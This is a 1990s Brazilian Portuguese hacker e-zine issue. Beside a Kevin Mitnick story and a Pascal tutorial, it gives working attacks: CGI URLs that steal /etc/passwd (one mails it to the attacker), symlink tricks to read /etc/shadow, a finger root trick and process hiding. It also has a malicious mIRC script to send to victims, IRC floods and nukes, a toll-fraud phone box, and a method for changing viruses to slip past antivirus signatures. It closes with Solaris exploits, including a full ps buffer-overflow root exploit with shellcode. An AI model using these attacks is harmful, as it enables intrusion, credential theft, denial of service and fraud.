zZZZZZZZZZZZZZZZz zZ cCCCCCCCCc sSSSSSSSSs zZ cCCCCCCCCCCCCc sSSSSSSSSSSSSs zZ cCCC CCCCc sSSS SSSSs zZ cCCCc SSSSs zZ II NNn NN EEEEE CCCCC SSSSSSSSSSs zZ II NNNn NN EE CCCCC SSSSSSSSSs zZ II NN NnNN EEEE CCCCC SSSSS zZ II NN NNN EE CCCC CCCCc sSSSS SSSS zZ II NN NN EEEEE CCCCCCCCCCCCCC SSSSSSSSSSSSSS zZ CCCCCCCCCC SSSSSSSSSS zZ zZ zZ zZZZZZZZZZZZZZZZZz PS: Se você não conseguiu lêr direito, aí em cima tah escrito CSZine. UIN da revista : 16623675 Canal da revista : #CSCHANNEL no irc.via-rs.com.br E-Mails da revista : cszine@hotmail.com cszine@xoommail.com Memoserv da revista: /msg memoserv send Struck (Soh no via-rs) Page da revista : http://members.xoom.com/cszine =-=-=-=-=-=-=-=-=-=-=-=-=-=-=Cheat=Struck-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Introdução: Eu realmete concordo com os kras q ainda estão escrevendo as matérias pra zine, eu sou rapido. Quando estava na edição numero 10 eu contatei-os e eles esperavam escrever a matéria para a 11, porém quando viram jah estavamos na 13. Essa rapidez e' quase um respeito a vc q está lendo. O mesmo respeito q eu gostaria que os outros zines tivessem comigo quando ainda era um coleci- onador de zines. Eu acabei rapidinho de lêr todos, todas as eições, e quando visitava akela site indicado na zine, para pegar a minha mais nova edição, eu só encontrava downloads de edições antigas. Aí começei a procurar zines espanhois, tais como SET(antiga saqueado- res). Acabei de lê-las e não sobrou muita coisa. Tive q me contentar com as zines americanas então. Aí que eu gostei, pois zines com phrack sempre estão sendo atualizadas. Acho q jah existem 53 edições da zine(espero q eu chegue lah!) e tudo com materias de prima. Então.. Eu não entendo porq zines tipo a Axur05(embora seja uma ótima zine, adimito) fazem questão de xingar os americanos por fazerem algo melhor do que eles. Vai vê eles não sabem inglês(brincadeirinha :¬). Eu ainda acho que a Axur05 é a melor zine do assunto brasileira. Mas se for avaliar a todas as zines do mundo, não só americanas e espanho-las mas alemãs, argentinas, etc, a Axur05 fica pra tráz rapidinho. Se isso acontece com uma zine blza tipo a Axur05, imagine com a CSZ?? ;) -=-=-=-=-=-=-=-=-==--=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Indice: Seção: Materia: Assunto: Autor: Nota: 1. Kevin Mitnick "O chacal da rede" AliBaBa 10,0 2. Programação Tutorial de pascal Cheat Struck 9,0 3. IRC Tips IRC Basics, IRC War Cheat Struck 9,0 4. Hacking p/ iniciantes Moore Truques Cheat Struck 10,0 5. Phreaking Iniciando com as boxes Cheat Struck 10,0 6. VIRII Testando seus vírus Cheat Struck 8,5 7. Bugz Outro bug para CGI Cheat Struck Bugs para Solaris Simon Phoenix 10,0 8. Crackerz Lista de hexas p3 Cheat Struck 9,0 9. Invasão de privacidade Invadindo WinNT Cheat Struck 10,0 10. Hack, the Art Lances Quentissimos!! Cheat Struck 10,0 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 1. Kevin Mitnick $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-==-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=- A história do Chacal da rede (ultima parte). No final de 1995, o software de Shimomura foi encontrado em uma conta no provedor de Internet da California, The Well. Mitnick havia criado uma conta fantasma nesse provedor e desde alí utilizava as ferramentas de Shimomura para lançar ataques a uma dezena de corporações de computadores, entre elas Motorola, Apple e Qualcomm. Shimomura se reunio com o gerente do The Well e com um técnico de Sprint(provedor de serviços telefonicos celulares) e descobriram que Mitnick havia criado um numero celular fantasma para acessar o sistema. Depois se 2 semanas de rastreios determinaram que as chamadas proveniam de Raleigh, Cali- fornia. Ao chegar Shimomura a Raleigh recebeu uma chamada do expert em segu- rança da InterNex, outro provedor de Internet da California. Mitnick havia invadido outra vez o sistema da InterNex, havia criado uma conta de nome Nancy, apagando uma com o nome Bob e havia mudado varias chaves de segurança incluindo a do expert e a do gerente do sistema que possue os privilegios mais altos. Da mesma maneira Shimomura teria informação sobre a invasão de Mitcnick a Netcom, uma rede de base de dados de noticias. Shimomura se comunicou com o FBI e estes enviaram um grupo de rastre- amento por radio. A equipe de rastreamento possuia um simulador de cela, um equipamento normalmente utilizado para testar telefones celulares mas modifi- caram-no para rastrear o telefone de Mitnick portanto que este esteja ligado e não esteja em uso. Com este aparelho o celular se converteria em um trans- missor sem que o usuario perceba. A meia-noite terminaram de colocar os equipamentos em uma Van e come- çou a busca do sinal, porque isso era o que queriam localizar; não buscavan a um homem porque todas as fotos que tinham eram velhas e não estavan seguros de seu aspecto atual, o objetivo dessa noite era determinar o lugar de origem do sinal. Ja pela madrugada localizaram o sinal em um grupo de apartamentos mas não puderam determinar em qual devido a interferencias no sinal. Depois deste ocorrido o pessoal da InterNex, The Well e Netcom esta- vam preocupados pelos movimentos que simultaneamente Mitnick fazia em cada um destes sistemas. Mudava chaves de acesso que ele mesmo havia criado e que teriam menos de 12 horas de funcionamento, utilizando códigos extranhos e ironicos como "no,panix", "fukhood" e "fuckjkt". Estava criando novas contas com maiores nívels de segurança como se suspeitasse que o estavam vigiando. O FBI, Shimomura e a equipe de Sprint havian-se reunido para planifi- car a captura. Shimomura enviou uma mensajem codificada ao encargado da Netcom para advertirlo que a prisão iria se realizar no dia seguinte, 16 de Fevereiro. Shimomura enviou a mensajem varias vezes por equivocação e o enca- regado interpretou que Mitnick ja havia sido preso, adiantando-se a realizar um Backup de todo o material que Mitnick havia armazenado no Netcom como evi- dencia e apagando as versões armazenadas por Mitnick. Teriam que realizar a prisão imediatamente, antes que Mitnick se desse conta de que sua informacão havia sido deletada. Quando faltavam minutos para dar a ordem, o simulador de celas detec- tou um novo sinal de transmissão de dados via celular e simultaneamente a de Mitnick, muito perto dessa zona. Algo estranho estava fazendo Mitnick com as linhas celulares, Shimomura tratou de adverter o agente do FBI mas tudo ja' estava nas mãos deles, Shimomura de agora em diante não era mais que um espe- ctador privilegiado. O FBI não pensava fazer uma entrada violenta porque não acreditavam que Mitnick estivesse armado, porem teriam que atuar muito rapido porque sabiam o dano que este homem podia causar em um só minuto com um com- putador. Se acercaram lentamente até a entrada do apartamento de Mitnick e anunciaram sua presença, se não lhes abrise a porta em 5 segundos a derruba- riam. Mitnick abriu a porta com toda calma e o FBI procediu a prisão e a recolher todo o material pertinente: discos, computador, telefones celulares, manuais, etc. De volta a seu hotel Shimomura decide chequar a secretaria eletronica de sua residencia em San Diego. Restou uma pessa quando escutoy a voz de Mitnick quem lhe havia deixado varias mensagens com sua vóz modificada. A Ultima destas mensages ele havia recebido 8 horas depois de que Mitnick havia sido preso e antes de que a imprensa tomasse conhecimento de todo o asunto. Como se realizou esta chamada ainda é um misterio igual que sua origen e o objetivo do segundo sinal de Mitnick. Este persistente hacker atualmente está sendo julgado e enfrenta 2 cargos federais, uso ilegal de equipamentos de acesso telefonico e fraude por computadores. Pode ser condenado por mais de 35 anos e a pagar uma multa de mais ou menos meio milhão de dólares. Mitnick também é suspeito de robar o software que as companias telefonicas pensam usar para todo tipo de procesos, desde a facturação até o seguimento da origen de uma chamada passando pela decodificação dos sinais dos telefones celulares para preservar sua privaci- dade. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 2. Programação $$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Aviso!!! Atenção programadores. Estou precisando de alguem para escrever tuto- riais de C para a zine. Eu ateh faria mas estou trabalhando em outros ramos. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-==- Tutorial de Pascal (parte 4) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= »»»»»»»»»»»»»» Dados Estruturados «««««««««««««« »»»»»»»»»»»»»» 1. Array ««««««««««««««« Cria varias variaveis com um mesmo valor. Ex: Var i : Tentativas = Array[1..100] of Integer; Com isso teremos 100 variaveis com o valor integer que são i1, i2, i3,.. Var i : Tentativas = Array[1..5,1..2] of Integer; Nesse caso teremos 10 variaveis especificadas em linhas de 1 a 5 e em colu- nas de 1 a 2. Essas variaveis serão chamadas assim: i[1,2] . Igual a linha 1 da coluna 2. »»»»»»»»»»»»»» 2. Record ««««««««««««««« Assume um valor de varios outros tipos. Ex: Var Registro : Record Nome : String[30]; Idade : Integer; Sexo : Char; Altura : Real; End; Com isso temos as variaveis Nome, Idade, Sexo e Altura definidas na varia- vel Registro. Agora para acessar estas sub-variaveis faça como no exemplo: Registro.Nome := 'Luiz Pereira'; Registro.Idade := 22; Registro.Sexo := 'M'; Registro.Altura := 1.78; Ao invés de ter que colocar sempre o Registro. antes da variavel vc pode fazer assim: With Registro do Begin Nome := 'Luiz Pereira'; Idade := 22; Sexo := 'M'; Altura := 1.78; End; »»»»»»»»»»»»»»» 3. Set ««««««««««««««« Permite a utilização de conjuntos. Ex: Var c : caracteres = set of Char; letras : letras_maiusculas = set of 'A'..'Z'; numeros : digitos = set of 0..9; marca : carros = set of (fusca, gol, opala, escort, corsa); Isso definiu as variaveis c, letras, numeros e marca para trabalharem com conjuntos. Para vc representar os conjuntos faça assim: c := ['a', 'e', 'i', 'o', 'u']; letras := ['B'..'H']; numeros := [0,3,5]; Ou.. a := [1,2,3]; b := [3,4,5]; c := a+b; O c é igual a [1,2,3,4,5]. Tb pode usar a interseção: a := [1,2,3]; b := [2,3,4]; c := a*b; Agora o c é os valores semelhantes em a e b, ou seja 2 e 3. a := [1,2,3,4]; b := [2,3,5]; c := a-b; d := b-a; Aki o c é os valores q tem em a e não tem em b(1 e 4). E c é os valores q tem em b e não tem em a(5). Vc tb pode usar estes seguintes elementos q vc já sabe pra q servem. a = b a <> b a >= b a <= b a IN b Neste ultimo, verifica se a é um valor de b. Por exemplo: a := [2]; b := [1,2,3,4,5]; a IN b; Quer dizer que a(2) esta no conjunto b. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Fim da parte 4 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$ $$$$$ 3. IRC Tips $$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- IRC Basics -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Começemos do basico para depois entendermos as guerras em IRC's. -=-=-=-=-=-=-=-= Lista de Comandos de IRC =-=-=-=-=-=-=-=-=- /list = lista canais do servidor /join #canal = entra no canal /part #canal = sai do canal /quit = disconecta /nick nick = Troca de nick /query nick = abre uma conversa privada /whois nick = mostra informações sobre certa pessoa /topic #canal topic = muda o topico do canal /ping nick = mostra o tempo q demora para ele responder(ctcp) /help = mostra ajuda do programa /ignore nick = ignora msgs da pessoa /ignore off = receber msgs de todos /invite nick #canal = Convida para o canal /kick #canal = Chuta o kra do canal /mode #canal +o nick = Dar status op /mode #canal +b nick = banir o nick do canal(quem usar este nick ñ entra) /mode #canal +v nick = Dar voice /mode #canal +i = Canal para convidados /mode #canal +p = Canal privado(ninguem entra) /mode #canal +m = Canal moderado(só ops e voices falam) /mode #canal +l ** = Canal limitado a ** usuários /mode #canal +s = Canal secreto /mode #canal +t = Apenas ops podem muda o topic /mode #canal +k senha = Canal protegido por senha PS: Para desfazer o q fez com o cmd /mode, basta trocar o + por -. -=-=-=-=-=-=-=-=-=-=-= Ban =-=-=-=-=-=-=-=-=-=-=- O ban(banimento) pode ser dado em varias forma, desde o nick até o seu dominio. Se banirem o seu nick não precisa pensar muito para poder voltar ao canal. Basta trocar o nick. Caso te deem ban pelo e-mail, basta ir ao setup e troca-lo. Se te banirem pela Maskara(user@host.com.br) basta ir ao Setup, abrir a pasta Identd e trocar o userID. Então como eu asseguro o meu canal?? Existe um tipo de ban muito usado quando um pentelho quer pq quer entrar no canal. Porém este ban é meio restrito, vc precisa ter certeza de q apenas akele palhaço acessa o servidor q vc irá banir. Então é só dar um +b a *@host.com.br e todos os kras que tiverem usando este provedor como acesso estão banidos. Não adianta o kra trocar o ID nem nada, tem que disconecta e conecta com outro provedor. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- IRC War -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-= Flood =-=-=-=-=-=-=-=-=-=-=- O Flood consta em fazer com que o usuário mande muita informação para o servidor e este o disconectará. Agora tah na kra o q tem que fazer naum?? Se vc mandar muitos pedidos de ctcp version pro kra, caso ele não esteja protegido, lhe tentará responder todos, assim o servidor o desconecta. Mas se eu mandar muitos ctcp version pro kra eles não irão passar pelo servidor tb?? Simm, por isso que o flood não deve ser feito sózinho, pois vc pode cair tb. -=-=-=-=-=-=-=-=-=-=-= script =-=-=-=-=-=-=-=-=-=- Faça um script maligno, usando o arquivo script.ini. Se não sabe como comandar o script.ini copie este arquivo: -------------------------Corte Aki------------------------------------------- >=1:ON TEXT:*:*:/say Eu sou gay >=1:ON TEXT:*:*:/mode # -o $me >=1:ON BAN:*:*:/mode # +b $me | /mode # -b $nick ----------------------------------------------------------------------------- Nomeie-o para script.ini e mande para a galera lamah. Ao aceitar o file, ele substituira o script.ini antigo e ae tudo o q o kra fizer será controlado pelo seu script. No exemplo acima , quando o krinha falar qualquer coisa, também dirá "eu sou gay" e perderá o op, se tiver. Caso um bot use seu script(pouco pro- vavel), quando ele banir alguem, será banido tb. -=-=-=-=-=-=-=-=-=-=-=-= Nuke =-=-=-=-=-=-=-=-=-=-=-=-=- Vou explicar 4 tipos de nuke: * ICMP Consiste em mandar muitas msgs ICMP para a pessoa, fazendo com q seu pro- grama cliente de IRC responda-os e feche a conexão. * OOB Aproveita um bug de protocolos do Windows(3.x, 95, NT). Neste caso é o netbios, porta 139. Assim o kra receberá akela tela azul indicando q ouve uma falha em Bla..Bla..Bla.. Para se proteger do nuke OOB basta renomear o arquivo vnbt.386 do dir c:\windows\system\ ou deleta-lo. * SSPING Este congela a sua makina utilizando outro bug dos windows. Ele manda varios pakotes para vc deixando seu sistema louco. Só afeta Windows. * TEARDROP Utiliza um bug conhecido tanto no Windows como no Linux. Para pro- teger seu Linux basta recompilar o kernel. -=-=-=-=-=-=-=-=-=-= ICMP Bombs =-=-=-=-=-=-=-=-=-=- Fácil, porém as veses pode não funcionar no Windows. Essas bombas fazem tanto lag no modem que seu ping aumentará terrivelmente. O fato de não funcionar, as vezes no Windows é que isso não é pra qualquer um, sendo que se vc possuir uma T1 talvés funcione. No linux nem te esquenta. No linux digite: ping -s (tamanho do pacote) -c (numero de pacotes) -f (IP) No Windows, vá para o prompt do dos e digite: ping (IP) -l (tamanho do pacote) -n (numero de pacotes) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ $$$$$$ $$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$ $$$$$ 4. Hacking p/ iniciantes $$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$ $$$$$$ $$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ Tah. Eu sei que na edição passada saiu muita babaquice que vc não tava nem aí pra saber. Porém antes disso havia saido uma matéira 10 para ini- ciantes saber por onde hackear(entrar, roubar, voltar). Vamos a mais coisas tipo akela.. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Roubando o arquivo de senhas 1. PHF (Dificil de encontrar) http://www.provedor.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 2. QUERY http://www.provedor.com.br/cgi-bin/query?%0a/bin/cat%20/etc/passwd 3. WEBDIST (Apenas em IRIX) http://www.provedor.com.br/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd 4. HANDLER (Também em IRIX) Dê um telnet pela porta 80(http) e digite: GET /cgi-bin/handler/whatever;cat /etc/passwd|? data=Download 5. WEBSENDMAIL Dê um telnet pela porta 80(http) e digite: POST /cgi-bin/websendmail HTTP/1.0 receiver=;mail+SEU@EMAIL.COM.BR ~/.html rm -f .lastlogin O arquivo de senhas está em .html no seu dir home. 7. DIP (Linux) Com isso vc obtem permisão de lêr o shadow usando o dip. Faça o se- guinte: ln -s /etc/shadow /tmp/dummy.dip Agora basta executar o /sbin/dip assim: dip -v /tmp/dummy.dip ou assim: ./sbin/dip -v /tmp/dummy.dip 8. FINGERLOG (linux) Procure pelo arquivo .fingerlog no seu dir home. Se existir faça: ln -s /etc/passwd .fingerlog finger você@localhost Pronto! o arquivo /etc/passwd está linkado para o .fingerlog. Se for preciso mude de /etc/passwd para /etc/shadow. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Não deixar Rastros 1. PS Todo o processo que vc faz no SO fica a disposição do root apenas digitando ps -ax. Para apagar isso faça o seguinte, tomando como exemplo que você quer apagar o cmd rlogin: ~] ps -ax | grep rlogin 6528 ?? S 0:00.06 rlogind 6527 p1 S+ 0:00.05 rlogin 127.0.0.1 6529 p1 S+ 0:00.01 rlogin 127.0.0.1 ~] kill -11 6529 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=- Obtendo o root 1. FINGER Para pegar o root por finger. Troque host pelo url. finger "|/bin/0@host" $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 5. Phreaking $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ Vamos estudar um pouco sobre telefonia aqui no brasil. Por q será que lá nos EUA existem milhares de boxes responsaveis por diversas ações phreakers e aki no Brasil existem umas 5 ou 6?? Será que a Embratel é melhor compania telefonica do q a dos EUA (sei lah o nome dela)?? Eu acho que não. Então vamos estudar os fios telefonicos para ajudar o pessoal a cons- truir novas boxes. Os kras do Hack n' Phreak já começaram com esse movimento (entre aspas) de phreakers. Olhe para o seu telefone. Veja o fio telefonico q liga o aparelho a linha telefonica. O mesmo fio que liga seu modem a extensão. Note que são compostos por dois outros fiosinhos, um vermelho e um verde. Talvéz o fio q sai do seu modem seja composto por 4 (amarelo, verde, vermelho e azul). Isso porq usa o sistema telefonico americano. Agora repare onde o plug do fio se encaixa para uma linha/extensão, é tipo uma tomada de 4 pinos porém com o plug para o fio telefonico. Que tal Nós a abrirmos, só pra ver?? Hm.. ______________________ | | | _ | | | | ______ | | |1| |__2___| | | |_| | | _ _ | | | | | | | | |3| |4| | | |_| |_| | | | |______________________| Esse é o formato da tomada, note que existem 4 pinos e 2 fios,apenas. Um esta ligado ao pino numero 1 e outro no pino numero 2. Enteresante naum?? 4 pinos para 2 fios?? Isso porque essas tomadas tb seguem o sistema telefonico dos EUA. Agora vc pode esperimentar mexer nos fios com diodos e resitores, ou apenas trocar os pinos de lugar, o q não resultará em muita coisa. Se vc trocar o pino numero 2 de lugar, tirará a linha do telefone. Isso parece meio idiota, mas é um exemplo de box simples(Fucker Box). Agora para experimentar uma box mais enteresante faça o seguinte: Pegue o fio que está no pino 1 e conecte-o para o pino 2. Use agora um resitor e ligue seus dois fios no pino 1 e no pino 3. Tente começar com uma resistencia de 4K ohms e aos poucos vá subindo até que não se ouça mais o tom de discagem. Quando isso acontecer, quer dizer q ta funcionando. Essa box faz com que a pessoa que disque para o seu numero não seja tarifada pela ligação, o nome da box é Black Box. Essa jah foi vista na zine Hack n' phreak. Na próxima edição, veremos a construção de mais 2 boxes. As boxes mais enteresantes até hoje, a meu respeito são a blue box, q tem o poder de controlar todo o sistema da central, enviando um ton de 2600Hz e tb a Rainbow Box que elimina o rastreamento enviando 120 volts pela linha. Outras tb interesantes são a red box, snow box, static e swich. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 6. VIRII $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Dicas para testar seus vírus -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-==-=-=-=-=- Numero 1. SuPeR iMpOrTaNtE !¡!¡! Nunca! Mas nunca mesmo! Teste um virus no seu hd. Isso vc já deve ter ouvido não?? É mas então vou fazer como pra testa-lo?? Ir a casa de um amigo? Não! Faça o seguinte: Ao ligar o computador aperte DEL para entrar no setup. Ae Entre no menu "STANDARD CMOS SETUP" E indique NONE no HD. Antes anote o tipo do seu hd para recupera-lo depois, isso se ainda não souber. Agora salve e saia. Insira um disco boot que contenha alguns arquivos insignificantes para que o vírus possa agir sobre eles. Tipo.. *.COM, *.EXE. Se precisar, vc terá q mudar algo simples como o drive onde o virus irá agir. Agora que está tudo pronto, verifique a data dos arquivos(antes de rodar o vírus). Rode-o e veja se as datas dos arquivos mudaram? Se sim, vc precisa acertar isso. Re-ative o HD e rode um antivirus no seu disquete. Melhor, copie os arquivos do disquete para um diretório no seu HD e o antivírus para um disk, e ative a proteção contra-gravação. Isso pq o vírus pode atacar o antivirus. Se for detectado algum vírus, vc sabe o q fazer naum?? Observe tb se o vírus é polimórfico(se seu arquivo agora está com outro nome, e tb verifique os arquivos ocultos. Agora isso é interesante, porém ja' saiu na Axur05 e a autoria dessa "macete" não é minha. O antivirus procura por caracteres hexadecimais nos programas, que tenham relação com um virus no seu banco de dados. Ae para descobrir estes caracteres, faça assim: Rode um editor hexadecimal num backup do virus e troque par a par de hexas por 00. Ae salve e rode o antivirus. Faça isso até que ele não seja detectado pelo antivirus. Pronto, vc sabe q região q o antivirus procura. Mude qquer coisa ali, coloque os códigos de uma forma diferente, adicione um nop, ou apenas um 00 no meio de dois pares. Atenção! Só se vc souber onde, pois a maioria dos cmds assembly são compostos por 2, 3 ou 4 pares. Atenção!!! Alguns dados foram extraidos da zine CountDown. Espero q esta zine não morra na primeira edição. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 7. Bugz $$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Outro bug no CGI. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Este bug é meio raro, mas ainda pode ser encontrado. É um bug de cgi-bin e com ele vc pode pegar qquer arquivo d .GIF do servidor, desde que saiba seu caminho correto. A principio parece inutil, mas pense nakelas fotos dos sites pornos. http://www.host.com.br/cgi-bin/Count.cgi?display=image&image=../../../../.. /../../../caminho/file.gif -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-= Bugs no Solaris ( autor: Simon Phoenix ) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- «»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«» * Versão: (todas) * Descrição: Ping of Death * Exploit: ping -sv -i 127.0.0.1 224.0.0.1 «»«»«»«»«»«»«»«»«»«»«»«»«»««»«»«»«»«»«» * Versão: 2.4 * Descrição: Ter licença para arquivos * Exploit: rm /var/tmp/locksuntechd ln -s /.rhosts /var/tmp/locksuntechd lmstat -c «»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«» * Versão: 2.5 * Descrição: Acesso de root * Exploit: ----------------------------------- ps_expl.sh------------------------------- CC=gcc cat > ps_expl.po << E_O_F domain "SUNW_OST_OSCMD" msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n" msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025" "\343\150\220\013\200\016\222\003\240\014\224\032\200\012" "\234\003\240\024\354\073\277\354\300\043\277\364\334\043" "\277\370\300\043\277\374\202\020\040\073\221\320\040\010" "\220\033\300\017\202\020\040\001\221\320\040\010" E_O_F msgfmt -o /tmp/foo ps_expl.po cat > ps_expl.c << E_O_F /*****************************************/ /* Exploit for Solaris 2.5 /usr/bin/ps */ /* J. Zbiciak, 5/18/97 */ /*****************************************/ #include #include #include #include #define BUF_LENGTH (632) #define EXTRA (256) int main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; char *envp[]={"NLSPATH=/tmp/foo",0}; u_long *long_p; u_char *char_p; u_long proc_link=0xef70ef70; int i; long_p = (u_long *) buf; for (i = 0; i < (96) / sizeof(u_long); i++) *long_p++ = 0x10101010; *long_p++=0xeffffcb0; *long_p++=0xffffffff; for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++) *long_p++ = 0x10101010; *long_p++ = 0xFFFFFFFF; *long_p++ = proc_link; *long_p++ = proc_link; *long_p++ = 0x0501FFFF; *long_p++ = 0xFFFFFFFF; *long_p++ = proc_link; *long_p++ = proc_link; *long_p++ = 0x4201FFFF; *long_p++ = 0xFFFFFFFF; *long_p++ = proc_link; *long_p++ = proc_link; *long_p++ = 0x4202FFFF; *long_p =0; execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp); perror("execle failed"); return 0; } E_O_F $CC -o ps_expl ps_expl.c exec ./ps_expl -------------------------------------EOF------------------------------------- 